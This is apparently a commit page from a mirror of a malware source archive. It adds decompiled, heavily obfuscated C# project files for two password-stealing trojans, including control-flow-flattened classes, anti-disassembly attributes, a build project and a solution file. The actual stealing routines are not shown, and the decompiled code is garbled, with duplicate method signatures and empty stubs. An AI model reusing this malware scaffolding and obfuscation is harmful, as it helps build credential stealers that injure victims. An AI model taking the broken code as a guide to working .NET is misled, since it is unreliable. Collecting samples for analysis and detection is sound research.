daniel/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2026-06-16 15:59:24 +00:00
Code Issues Projects Releases Wiki Activity

auto-decompiled msil via petikvx

Browse Source 
add
This commit is contained in:
vxunderground
2022-08-18 06:28:56 -05:00
parent 26192f771b
commit f2ac1ece55
12767 changed files with 1945075 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
MSIL/Trojan-PSW/Win32/A/Trojan-PSW.Win32.Asteal.c-fddc20ed7bb8c128cb9eb52c01c034a0ed2664075ae218389375e9665be9a283/1286ccb9-01dc-498b-84d2-3a004b81419d
BIN
View File
Binary file not shown.
MSIL/Trojan-PSW/Win32/A/Trojan-PSW.Win32.Asteal.c-fddc20ed7bb8c128cb9eb52c01c034a0ed2664075ae218389375e9665be9a283/AssemblyInfo.cs
+21
View File
@@ -0,0 +1,21 @@
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
using System.Security;
[assembly: AllowPartiallyTrustedCallers]
[assembly: SuppressIldasm]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyKeyFile("")]
[assembly: AssemblyDelaySign(false)]
[assembly: AssemblyKeyName("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyFileVersion("5.6.7.8")]
[assembly: AssemblyDescription("Do whatever you want")]
[assembly: AssemblyCopyright("Sup Inc.,")]
[assembly: AssemblyProduct("712638")]
[assembly: AssemblyTitle("RK's map")]
[assembly: AssemblyCompany("")]
[assembly: Guid("7a372557-d889-4df6-8495-e44dd22e054c")]
[assembly: ComVisible(true)]
[assembly: AssemblyVersion("1.2.3.4")]
MSIL/Trojan-PSW/Win32/A/Trojan-PSW.Win32.Asteal.c-fddc20ed7bb8c128cb9eb52c01c034a0ed2664075ae218389375e9665be9a283/R_K/My/MySettings.cs
+175
View File
@@ -0,0 +1,175 @@
// Decompiled with JetBrains decompiler
// Type: R_K.My.MySettings
// Assembly: RK, Version=1.2.3.4, Culture=neutral, PublicKeyToken=null
// MVID: 30CD1E36-C1DC-494F-9864-11C186F7E011
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan-PSW.Win32.Asteal.c-fddc20ed7bb8c128cb9eb52c01c034a0ed2664075ae218389375e9665be9a283.exe
using \u0091\u008E\u008C\u008C\u008E\u0092\u008F\u0094\u0091\u0093\u0092\u0088\u008D\u008F\u008B\u008A\u008F\u0089\u0087\u008E\u008F\u0086\u008F\u008D\u008F\u0086\u0091\u0094\u0092\u008B\u0093\u008A\u008E\u0086\u0094\u0087;
using System;
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Configuration;
using System.Diagnostics;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
namespace R_K.My
{
[CompilerGenerated]
[GeneratedCode("Microsoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator", "9.0.0.0")]
[EditorBrowsable(EditorBrowsableState.Advanced)]
internal sealed class MySettings : ApplicationSettingsBase
{
private static MySettings defaultInstance;
private static bool addedHandler;
private static object addedHandlerLockObject;
[MethodImpl(MethodImplOptions.NoInlining)]
static MySettings()
{
\u0093\u008D\u0088\u0095\u0092\u008D\u0086\u008A\u008D\u0087\u0094\u008B\u0090\u0088\u0087\u0091\u008F\u008F\u0088\u0095\u0090\u0087\u0086\u008E\u0093\u008F\u0093\u008E\u008A\u0086\u0089\u0086\u0093\u0086\u008A\u008F.\u008B\u008F\u008A\u0091\u0092\u0089\u008A\u0086\u008D\u0088\u008A\u0095\u008E\u0089\u008A\u0093\u008F\u0089\u008B\u0094\u0090\u0088\u0087\u008F\u0089\u008E\u008F\u0093\u0089\u0086\u0093\u008B\u008E\u008B\u0091\u0095();
int num1;
// ISSUE: reference to a compiler-generated method
if (!MySettings.\u008D\u0092\u0089\u0095\u0094\u008A\u008B\u0089\u008E\u0087\u008F\u0090\u008C\u0086\u008E\u008E\u0090\u0094\u0089\u0086\u008F\u0087\u008A\u0094\u0094\u0090\u0095\u008E\u0090\u0087\u0091\u0089\u0089\u0095\u0091\u0091())
num1 = 1;
else
goto label_6;
label_3:
int num2 = num1;
label_4:
do
{
switch (num2)
{
case 0:
case 1:
// ISSUE: reference to a compiler-generated method
MySettings.\u0086\u008A\u0093\u008D\u008B\u0090\u0094\u0092\u0089\u0094\u008A\u0091\u0088\u008F\u008F\u0090\u008B\u008F\u0088\u0089\u0095\u0087\u0091\u0092\u0095\u008E\u008B\u0089\u0095\u0091\u0092\u008A\u008E\u0094\u008D\u0091();
num2 = 4;
continue;
case 4:
goto label_2;
case 5:
goto label_5;
default:
goto label_7;
}
}
while (true);
goto label_9;
label_2:
// ISSUE: reference to a compiler-generated field
// ISSUE: object of a compiler-generated type is created
// ISSUE: reference to a compiler-generated method
MySettings.defaultInstance = (MySettings) MySettings.\u0086\u008A\u0093\u008D\u008B\u0090\u0094\u0092\u0089\u0094\u008A\u0091\u0088\u008F\u008F\u0090\u008B\u008F\u0088\u0089\u0095\u0087\u0091\u0092\u0095\u008E\u008B\u0089\u0095\u0091\u0092\u008A\u008E\u0094\u008D\u0091((object) new MySettings());
goto label_7;
label_5:
return;
label_9:
return;
label_6:
num2 = 3;
if (true)
goto label_4;
label_7:
// ISSUE: reference to a compiler-generated field
// ISSUE: reference to a compiler-generated method
MySettings.addedHandlerLockObject = MySettings.\u0086\u008A\u0093\u008D\u008B\u0090\u0094\u0092\u0089\u0094\u008A\u0091\u0088\u008F\u008F\u0090\u008B\u008F\u0088\u0089\u0095\u0087\u0091\u0092\u0095\u008E\u008B\u0089\u0095\u0091\u0092\u008A\u008E\u0094\u008D\u0091(new object());
num1 = 5;
goto label_3;
}
[DebuggerNonUserCode]
[MethodImpl(MethodImplOptions.NoInlining)]
public MySettings()
{
}
[DebuggerNonUserCode]
[EditorBrowsable(EditorBrowsableState.Advanced)]
[MethodImpl(MethodImplOptions.NoInlining)]
private static void AutoSaveSettings(object sender, EventArgs e)
{
}
public static MySettings Default
{
[MethodImpl(MethodImplOptions.NoInlining)] get => (MySettings) null;
}
[MethodImpl(MethodImplOptions.NoInlining)]
internal static void \u0086\u008A\u0093\u008D\u008B\u0090\u0094\u0092\u0089\u0094\u008A\u0091\u0088\u008F\u008F\u0090\u008B\u008F\u0088\u0089\u0095\u0087\u0091\u0092\u0095\u008E\u008B\u0089\u0095\u0091\u0092\u008A\u008E\u0094\u008D\u0091()
{
}
[MethodImpl(MethodImplOptions.NoInlining)]
static object \u0086\u008A\u0093\u008D\u008B\u0090\u0094\u0092\u0089\u0094\u008A\u0091\u0088\u008F\u008F\u0090\u008B\u008F\u0088\u0089\u0095\u0087\u0091\u0092\u0095\u008E\u008B\u0089\u0095\u0091\u0092\u008A\u008E\u0094\u008D\u0091(
[In] object obj0)
{
return (object) null;
}
[MethodImpl(MethodImplOptions.NoInlining)]
static object \u0086\u008A\u0093\u008D\u008B\u0090\u0094\u0092\u0089\u0094\u008A\u0091\u0088\u008F\u008F\u0090\u008B\u008F\u0088\u0089\u0095\u0087\u0091\u0092\u0095\u008E\u008B\u0089\u0095\u0091\u0092\u008A\u008E\u0094\u008D\u0091(
[In] object obj0)
{
return (object) null;
}
[MethodImpl(MethodImplOptions.NoInlining)]
internal static bool \u0089\u008D\u0089\u0089\u0092\u0095\u0092\u0087\u008B\u0094\u008B\u008A\u0094\u008B\u008F\u008F\u0089\u0091\u008A\u0091\u0090\u008F\u0093\u008E\u008B\u0093\u008D\u008F\u0095\u008F\u0091\u0090\u0089\u0086\u008B\u0092() => true;
[MethodImpl(MethodImplOptions.NoInlining)]
internal static bool \u008D\u0092\u0089\u0095\u0094\u008A\u008B\u0089\u008E\u0087\u008F\u0090\u008C\u0086\u008E\u008E\u0090\u0094\u0089\u0086\u008F\u0087\u008A\u0094\u0094\u0090\u0095\u008E\u0090\u0087\u0091\u0089\u0089\u0095\u0091\u0091() => true;
[MethodImpl(MethodImplOptions.NoInlining)]
static void \u0086\u008A\u0093\u008D\u008B\u0090\u0094\u0092\u0089\u0094\u008A\u0091\u0088\u008F\u008F\u0090\u008B\u008F\u0088\u0089\u0095\u0087\u0091\u0092\u0095\u008E\u008B\u0089\u0095\u0091\u0092\u008A\u008E\u0094\u008D\u0091(
[In] object obj0)
{
}
[MethodImpl(MethodImplOptions.NoInlining)]
static object \u0086\u008A\u0093\u008D\u008B\u0090\u0094\u0092\u0089\u0094\u008A\u0091\u0088\u008F\u008F\u0090\u008B\u008F\u0088\u0089\u0095\u0087\u0091\u0092\u0095\u008E\u008B\u0089\u0095\u0091\u0092\u008A\u008E\u0094\u008D\u0091() => (object) null;
[MethodImpl(MethodImplOptions.NoInlining)]
static bool \u0086\u008A\u0093\u008D\u008B\u0090\u0094\u0092\u0089\u0094\u008A\u0091\u0088\u008F\u008F\u0090\u008B\u008F\u0088\u0089\u0095\u0087\u0091\u0092\u0095\u008E\u008B\u0089\u0095\u0091\u0092\u008A\u008E\u0094\u008D\u0091(
[In] object obj0)
{
return true;
}
[MethodImpl(MethodImplOptions.NoInlining)]
static object \u0086\u008A\u0093\u008D\u008B\u0090\u0094\u0092\u0089\u0094\u008A\u0091\u0088\u008F\u008F\u0090\u008B\u008F\u0088\u0089\u0095\u0087\u0091\u0092\u0095\u008E\u008B\u0089\u0095\u0091\u0092\u008A\u008E\u0094\u008D\u0091() => (object) null;
[MethodImpl(MethodImplOptions.NoInlining)]
static void \u0086\u008A\u0093\u008D\u008B\u0090\u0094\u0092\u0089\u0094\u008A\u0091\u0088\u008F\u008F\u0090\u008B\u008F\u0088\u0089\u0095\u0087\u0091\u0092\u0095\u008E\u008B\u0089\u0095\u0091\u0092\u008A\u008E\u0094\u008D\u0091(
[In] object obj0)
{
}
[MethodImpl(MethodImplOptions.NoInlining)]
static void \u0086\u008A\u0093\u008D\u008B\u0090\u0094\u0092\u0089\u0094\u008A\u0091\u0088\u008F\u008F\u0090\u008B\u008F\u0088\u0089\u0095\u0087\u0091\u0092\u0095\u008E\u008B\u0089\u0095\u0091\u0092\u008A\u008E\u0094\u008D\u0091(
[In] object obj0)
{
}
[MethodImpl(MethodImplOptions.NoInlining)]
static void \u0086\u008A\u0093\u008D\u008B\u0090\u0094\u0092\u0089\u0094\u008A\u0091\u0088\u008F\u008F\u0090\u008B\u008F\u0088\u0089\u0095\u0087\u0091\u0092\u0095\u008E\u008B\u0089\u0095\u0091\u0092\u008A\u008E\u0094\u008D\u0091(
[In] object obj0)
{
}
[MethodImpl(MethodImplOptions.NoInlining)]
static void \u0086\u008A\u0093\u008D\u008B\u0090\u0094\u0092\u0089\u0094\u008A\u0091\u0088\u008F\u008F\u0090\u008B\u008F\u0088\u0089\u0095\u0087\u0091\u0092\u0095\u008E\u008B\u0089\u0095\u0091\u0092\u008A\u008E\u0094\u008D\u0091(
[In] object obj0,
[In] object obj1)
{
}
[MethodImpl(MethodImplOptions.NoInlining)]
static void \u0086\u008A\u0093\u008D\u008B\u0090\u0094\u0092\u0089\u0094\u008A\u0091\u0088\u008F\u008F\u0090\u008B\u008F\u0088\u0089\u0095\u0087\u0091\u0092\u0095\u008E\u008B\u0089\u0095\u0091\u0092\u008A\u008E\u0094\u008D\u0091(
[In] object obj0)
{
}
}
}
MSIL/Trojan-PSW/Win32/A/Trojan-PSW.Win32.Asteal.c-fddc20ed7bb8c128cb9eb52c01c034a0ed2664075ae218389375e9665be9a283/R_K/Resources.resx
+120
View File
@@ -0,0 +1,120 @@
<?xml version="1.0" encoding="utf-8"?>
<root>
<!--
Microsoft ResX Schema
Version 2.0
The primary goals of this format is to allow a simple XML format
that is mostly human readable. The generation and parsing of the
various data types are done through the TypeConverter classes
associated with the data types.
Example:
... ado.net/XML headers & schema ...
<resheader name="resmimetype">text/microsoft-resx</resheader>
<resheader name="version">2.0</resheader>
<resheader name="reader">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader>
<resheader name="writer">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader>
<data name="Name1"><value>this is my long string</value><comment>this is a comment</comment></data>
<data name="Color1" type="System.Drawing.Color, System.Drawing">Blue</data>
<data name="Bitmap1" mimetype="application/x-microsoft.net.object.binary.base64">
<value>[base64 mime encoded serialized .NET Framework object]</value>
</data>
<data name="Icon1" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
<value>[base64 mime encoded string representing a byte array form of the .NET Framework object]</value>
<comment>This is a comment</comment>
</data>
There are any number of "resheader" rows that contain simple
name/value pairs.
Each data row contains a name, and value. The row also contains a
type or mimetype. Type corresponds to a .NET class that support
text/value conversion through the TypeConverter architecture.
Classes that don't support this are serialized and stored with the
mimetype set.
The mimetype is used for serialized objects, and tells the
ResXResourceReader how to depersist the object. This is currently not
extensible. For a given mimetype the value must be set accordingly:
Note - application/x-microsoft.net.object.binary.base64 is the format
that the ResXResourceWriter will generate, however the reader can
read any of the formats listed below.
mimetype: application/x-microsoft.net.object.binary.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Binary.BinaryFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.soap.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Soap.SoapFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.bytearray.base64
value : The object must be serialized into a byte array
: using a System.ComponentModel.TypeConverter
: and then encoded with base64 encoding.
-->
<xsd:schema id="root" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">
<xsd:import namespace="http://www.w3.org/XML/1998/namespace" />
<xsd:element name="root" msdata:IsDataSet="true">
<xsd:complexType>
<xsd:choice maxOccurs="unbounded">
<xsd:element name="metadata">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" />
</xsd:sequence>
<xsd:attribute name="name" use="required" type="xsd:string" />
<xsd:attribute name="type" type="xsd:string" />
<xsd:attribute name="mimetype" type="xsd:string" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="assembly">
<xsd:complexType>
<xsd:attribute name="alias" type="xsd:string" />
<xsd:attribute name="name" type="xsd:string" />
</xsd:complexType>
</xsd:element>
<xsd:element name="data">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
<xsd:element name="comment" type="xsd:string" minOccurs="0" msdata:Ordinal="2" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" msdata:Ordinal="1" />
<xsd:attribute name="type" type="xsd:string" msdata:Ordinal="3" />
<xsd:attribute name="mimetype" type="xsd:string" msdata:Ordinal="4" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="resheader">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" />
</xsd:complexType>
</xsd:element>
</xsd:choice>
</xsd:complexType>
</xsd:element>
</xsd:schema>
<resheader name="resmimetype">
<value>text/microsoft-resx</value>
</resheader>
<resheader name="version">
<value>2.0</value>
</resheader>
<resheader name="reader">
<value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<resheader name="writer">
<value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
</root>
MSIL/Trojan-PSW/Win32/A/Trojan-PSW.Win32.Asteal.c-fddc20ed7bb8c128cb9eb52c01c034a0ed2664075ae218389375e9665be9a283/Trojan-PSW.Win32.Asteal.c.csproj
+66
View File
@@ -0,0 +1,66 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan-PSW.Win32.Asteal.c-fddc20ed7bb8c128cb9eb52c01c034a0ed2664075ae218389375e9665be9a283.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{F88A1E7E-FECE-4DDB-A6B4-9F156A0BF39E}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>RK</AssemblyName>
<ApplicationVersion>1.2.3.4</ApplicationVersion>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="Microsoft.VisualBasic" />
<Reference Include="System" />
<Reference Include="System.Drawing" />
<Reference Include="System.Windows.Forms" />
</ItemGroup>
<ItemGroup>
<Compile Include="_003CModule_003E.cs" />
<Compile Include="_003CModule_003E{47562485-194B-4BC9-B0DC-38EFC00B1.cs" />
<Compile Include="_008E_0089_0092_0090_0090_008B_0095_008D_008B_0094_0093_0092_008D_008A_0094_0088_008F_0089_008D_0094_008C_0093_0086_0093_0094_0088_0095_0087_008A_0086_0088_0088_008D_0091_0087_008C\_008A_008E_0089_0095_0091_008D_0088_0094_0086_0092.cs" />
<Compile Include="_0094_0089_0093_0090_0093_0088_008B_0089_008D_008D_0095_008F_0095_0088_0092_0094_008B_008B_008E_008E_008D_008E_0094_008A_0095_0086_0095_0089_0086_0090_0095_008A_0093_008B_0090_008B\_0087_0087_008E_008D_0086_0092_0091_008B_008C_0093.cs" />
<Compile Include="_0094_0089_0093_0090_0093_0088_008B_0089_008D_008D_0095_008F_0095_0088_0092_0094_008B_008B_008E_008E_008D_008E_0094_008A_0095_0086_0095_0089_0086_0090_0095_008A_0093_008B_0090_008B\_008B_008F_008E_0095_008A_0095_0094_008C_008A_0090.cs" />
<Compile Include="_0094_0089_0093_0090_0093_0088_008B_0089_008D_008D_0095_008F_0095_0088_0092_0094_008B_008B_008E_008E_008D_008E_0094_008A_0095_0086_0095_0089_0086_0090_0095_008A_0093_008B_0090_008B\_008A_0091_008A_0086_0088_008D_008F_0086_008E_008A.cs" />
<Compile Include="_0094_0089_0093_0090_0093_0088_008B_0089_008D_008D_0095_008F_0095_0088_0092_0094_008B_008B_008E_008E_008D_008E_0094_008A_0095_0086_0095_0089_0086_0090_0095_008A_0093_008B_0090_008B\_0091_0095_008F_008B_0089_008E_008E_008D_0092_008B.cs" />
<Compile Include="_0094_0089_0093_0090_0093_0088_008B_0089_008D_008D_0095_008F_0095_0088_0092_0094_008B_008B_008E_008E_008D_008E_0094_008A_0095_0086_0095_0089_0086_0090_0095_008A_0093_008B_0090_008B\_0089_0088_008C_008A_008F_0089_008E_008A_008D_0089.cs" />
<Compile Include="_0094_0089_0093_0090_0093_0088_008B_0089_008D_008D_0095_008F_0095_0088_0092_0094_008B_008B_008E_008E_008D_008E_0094_008A_0095_0086_0095_0089_0086_0090_0095_008A_0093_008B_0090_008B\_008B_0091_0094_0086_0091_008A_0092_0090_008F_008D.cs" />
<Compile Include="_0094_0089_0093_0090_0093_0088_008B_0089_008D_008D_0095_008F_0095_0088_0092_0094_008B_008B_008E_008E_008D_008E_0094_008A_0095_0086_0095_0089_0086_0090_0095_008A_0093_008B_0090_008B\_0087_008E_008E_0086_0091_0091_0095_0095_0091_0088.cs" />
<Compile Include="_0094_0089_0093_0090_0093_0088_008B_0089_008D_008D_0095_008F_0095_0088_0092_0094_008B_008B_008E_008E_008D_008E_0094_008A_0095_0086_0095_0089_0086_0090_0095_008A_0093_008B_0090_008B\_008C_0086_0088_008F_008D_008A_0088_0087_0089_0087.cs" />
<Compile Include="_0091_008E_008C_008C_008E_0092_008F_0094_0091_0093_0092_0088_008D_008F_008B_008A_008F_0089_0087_008E_008F_0086_008F_008D_008F_0086_0091_0094_0092_008B_0093_008A_008E_0086_0094_0087\_0093_008D_0088_0095_0092_008D_0086_008A_008D_0087.cs" />
<Compile Include="R_K\My\MySettings.cs" />
<Compile Include="_008A_0087_008F_0087_0092_0091_0088_008E_0093_008D_0087_008E_008E_0088_0094_0091_0090_0088_0088_008F_0094_008F_0087_0091_0095_0089_0087_008E_0088_0093_0090_0094_0088_008D_008E_008B\_0095_0088_0088_0090_008C_0093_008B_008D_008C_008A.cs" />
<Compile Include="_008B_0086_0086_008F_008B_0093_0095_0092_008F_008E_0087_0086_0089_0089_0087_0092_008E_0087_0091_008D_008F_008A_0091_0093_0088_0090_0089_008F_0089_008E_0092_0090_008F_0089_0093_0091\_0095_0095_0086_0094_0088_0091_008D_0087_008C_0091.cs" />
<Compile Include="_008E_008D_0086_0086_0090_008A_0090_008F_008E_0091_0092_0090_0087_008A_0087_0091_0094_0086_008E_008E_0095_0091_0094_0093_008A_0087_0087_0086_008E_008D_008E_0092_008A_008A_008F_008D\_008C_0092_008B_008E_008C_008F_0092_0094_008C_0086.cs" />
<Compile Include="_0090_0086_0095_0092_008B_0088_0089_0090_008C_0088_0086_0095_008D_0091_008A_008F_008A_008F_008F_0094_008E_0087_0090_0089_0090_0089_0090_008B_008E_008C_0088_0094_008B_0090_0088_0092\_0092_0089_008F_0091_0090_008F_0094_0094_0086_0088.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<EmbeddedResource Include="   " />
<EmbeddedResource Include="_008A_0087_008F_0087_0092_0091_0088_008E_0093_008D_0087_008E_008E_0088_0094_0091_0090_0088_0088_008F_0094_008F_0087_0091_0095_0089_0087_008E_0088_0093_0090_0094_0088_008D_008E_008B\_0095_0088_0088_0090_008C_0093_008B_008D_008C_008A_0091_008E_0089_0095_0088_008E_0094_008D_008F_008B_0089_0087_0087_0087_008F_008F_0089_0092_008C_0087_008E_0089_0092_0090_0088_0092.resx" />
<EmbeddedResource Include="1286ccb9-01dc-498b-84d2-3a004b81419d" />
<EmbeddedResource Include="a386bc81-f6ca-4da3-93b0-b3ee6391dc7c" />
<EmbeddedResource Include="a6538a39-a489-4fc0-b71d-56342f265087" />
<EmbeddedResource Include="R_K\Resources.resx" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
MSIL/Trojan-PSW/Win32/A/Trojan-PSW.Win32.Asteal.c-fddc20ed7bb8c128cb9eb52c01c034a0ed2664075ae218389375e9665be9a283/Trojan-PSW.Win32.Asteal.c.sln
+20
View File
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "RK", "Trojan-PSW.Win32.Asteal.c-fddc20ed7bb8c128cb9eb52c01c034a0ed2664075ae218389375e9665be9a283.csproj", "{F88A1E7E-FECE-4DDB-A6B4-9F156A0BF39E}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{F88A1E7E-FECE-4DDB-A6B4-9F156A0BF39E}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{F88A1E7E-FECE-4DDB-A6B4-9F156A0BF39E}.Debug|Any CPU.Build.0 = Debug|Any CPU
{F88A1E7E-FECE-4DDB-A6B4-9F156A0BF39E}.Release|Any CPU.ActiveCfg = Release|Any CPU
{F88A1E7E-FECE-4DDB-A6B4-9F156A0BF39E}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
MSIL/Trojan-PSW/Win32/A/Trojan-PSW.Win32.Asteal.c-fddc20ed7bb8c128cb9eb52c01c034a0ed2664075ae218389375e9665be9a283/_003CModule_003E.cs
+12
View File
@@ -0,0 +1,12 @@
// Decompiled with JetBrains decompiler
// Type: <Module>
// Assembly: RK, Version=1.2.3.4, Culture=neutral, PublicKeyToken=null
// MVID: 30CD1E36-C1DC-494F-9864-11C186F7E011
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan-PSW.Win32.Asteal.c-fddc20ed7bb8c128cb9eb52c01c034a0ed2664075ae218389375e9665be9a283.exe
using \u0091\u008E\u008C\u008C\u008E\u0092\u008F\u0094\u0091\u0093\u0092\u0088\u008D\u008F\u008B\u008A\u008F\u0089\u0087\u008E\u008F\u0086\u008F\u008D\u008F\u0086\u0091\u0094\u0092\u008B\u0093\u008A\u008E\u0086\u0094\u0087;
internal class \u003CModule\u003E
{
static \u003CModule\u003E() => \u0093\u008D\u0088\u0095\u0092\u008D\u0086\u008A\u008D\u0087\u0094\u008B\u0090\u0088\u0087\u0091\u008F\u008F\u0088\u0095\u0090\u0087\u0086\u008E\u0093\u008F\u0093\u008E\u008A\u0086\u0089\u0086\u0093\u0086\u008A\u008F.\u008B\u008F\u008A\u0091\u0092\u0089\u008A\u0086\u008D\u0088\u008A\u0095\u008E\u0089\u008A\u0093\u008F\u0089\u008B\u0094\u0090\u0088\u0087\u008F\u0089\u008E\u008F\u0093\u0089\u0086\u0093\u008B\u008E\u008B\u0091\u0095();
}
MSIL/Trojan-PSW/Win32/A/Trojan-PSW.Win32.Asteal.c-fddc20ed7bb8c128cb9eb52c01c034a0ed2664075ae218389375e9665be9a283/_003CModule_003E{47562485-194B-4BC9-B0DC-38EFC00B1.cs
+12
View File
@@ -0,0 +1,12 @@
// Decompiled with JetBrains decompiler
// Type: <Module>{47562485-194B-4BC9-B0DC-38EFC00B17FB}
// Assembly: RK, Version=1.2.3.4, Culture=neutral, PublicKeyToken=null
// MVID: 30CD1E36-C1DC-494F-9864-11C186F7E011
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan-PSW.Win32.Asteal.c-fddc20ed7bb8c128cb9eb52c01c034a0ed2664075ae218389375e9665be9a283.exe
using \u0091\u008E\u008C\u008C\u008E\u0092\u008F\u0094\u0091\u0093\u0092\u0088\u008D\u008F\u008B\u008A\u008F\u0089\u0087\u008E\u008F\u0086\u008F\u008D\u008F\u0086\u0091\u0094\u0092\u008B\u0093\u008A\u008E\u0086\u0094\u0087;
internal class \u003CModule\u003E\u007B47562485\u002D194B\u002D4BC9\u002DB0DC\u002D38EFC00B17FB\u007D
{
static \u003CModule\u003E\u007B47562485\u002D194B\u002D4BC9\u002DB0DC\u002D38EFC00B17FB\u007D() => \u0093\u008D\u0088\u0095\u0092\u008D\u0086\u008A\u008D\u0087\u0094\u008B\u0090\u0088\u0087\u0091\u008F\u008F\u0088\u0095\u0090\u0087\u0086\u008E\u0093\u008F\u0093\u008E\u008A\u0086\u0089\u0086\u0093\u0086\u008A\u008F.\u008B\u008F\u008A\u0091\u0092\u0089\u008A\u0086\u008D\u0088\u008A\u0095\u008E\u0089\u008A\u0093\u008F\u0089\u008B\u0094\u0090\u0088\u0087\u008F\u0089\u008E\u008F\u0093\u0089\u0086\u0093\u008B\u008E\u008B\u0091\u0095();
}
MSIL/Trojan-PSW/Win32/A/Trojan-PSW.Win32.Asteal.c-fddc20ed7bb8c128cb9eb52c01c034a0ed2664075ae218389375e9665be9a283/a386bc81-f6ca-4da3-93b0-b3ee6391dc7c
BIN
View File
Binary file not shown.
MSIL/Trojan-PSW/Win32/A/Trojan-PSW.Win32.Asteal.c-fddc20ed7bb8c128cb9eb52c01c034a0ed2664075ae218389375e9665be9a283/a6538a39-a489-4fc0-b71d-56342f265087
+1
View File
@@ -0,0 +1 @@
Enq^Vq۱%
MSIL/Trojan-PSW/Win32/A/Trojan-PSW.Win32.Asteal.c-fddc20ed7bb8c128cb9eb52c01c034a0ed2664075ae218389375e9665be9a283/​  ​      ​
BIN
View File
Binary file not shown.
MSIL/Trojan-PSW/Win32/C/Trojan-PSW.Win32.Chisburg.whx-d16332af030d1b00f8f014c06b4e039d4e412ad6c23b4d921524f9a3e027784f/AssemblyInfo.cs
+3
View File
@@ -0,0 +1,3 @@
using System.Reflection;
[assembly: AssemblyVersion("0.0.0.0")]
MSIL/Trojan-PSW/Win32/C/Trojan-PSW.Win32.Chisburg.whx-d16332af030d1b00f8f014c06b4e039d4e412ad6c23b4d921524f9a3e027784f/MyApplication.cs
+18
View File
@@ -0,0 +1,18 @@
// Decompiled with JetBrains decompiler
// Type: My.MyApplication
// Assembly: kripted, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: F2186B1A-2E99-4A23-AA3D-671873E0755D
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-PSW.Win32.Chisburg.whx-d16332af030d1b00f8f014c06b4e039d4e412ad6c23b4d921524f9a3e027784f.exe
using Microsoft.VisualBasic.ApplicationServices;
using System.CodeDom.Compiler;
using System.ComponentModel;
namespace My
{
[EditorBrowsable(EditorBrowsableState.Never)]
[GeneratedCode("MyTemplate", "8.0.0.0")]
internal class MyApplication : ApplicationBase
{
}
}
